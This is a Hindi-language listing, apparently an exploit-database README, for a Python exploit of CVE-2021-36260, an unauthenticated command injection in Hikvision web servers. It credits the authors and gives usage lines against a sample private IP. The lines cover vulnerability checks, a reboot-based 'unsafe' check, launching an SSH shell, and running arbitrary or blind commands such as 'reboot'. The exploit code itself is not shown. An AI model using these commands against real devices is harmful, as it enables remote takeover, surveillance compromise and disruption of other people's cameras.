
CVE-2021-36260 कमांड इंजेक्शन के लिए Hikvision वेब सर्वरों पर पायथन एक्सप्लॉइट। सुरक्षित/असुरक्षित भेद्यता सत्यापन, दूरस्थ कमांड निष्पादन, और IoT उपकरणों पर SSH शेल एक्सेस का समर्थन करता है।
CVE-2021-36260 कुछ Hikvision उत्पादों के वेब सर्वर में कमांड इंजेक्शन भेद्यता का POC है। अपर्याप्त इनपुट सत्यापन के कारण, हमलावर दुर्भावनापूर्ण कमांड वाले कुछ संदेश भेजकर कमांड इंजेक्शन हमला शुरू करने के लिए भेद्यता का शोषण कर सकता है।
शोषण शीर्षक: Hikvision Web Server Build 210702 - Command Injection
शोषण लेखक: bashis -- त्रुटियाँ shubtheone द्वारा अपडेट की गईं
विक्रेता होमपेज: https://www.hikvision.com/
संस्करण: 1.0
CVE: CVE-2021-36260
संदर्भ: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
नोट:
[उदाहरण] सुरक्षित भेद्यता/सत्यापन जांच: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
सुरक्षित और असुरक्षित भेद्यता/सत्यापन जांच: (केवल 'असुरक्षित जांच' का उपयोग करेगा यदि 'सुरक्षित जांच' से सत्यापित नहीं किया गया है) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
असुरक्षित भेद्यता/सत्यापन जांच: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
SSH शेल लॉन्च करें और कनेक्ट करें: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
कमांड निष्पादित करें: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
ब्लाइंड कमांड निष्पादित करें: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"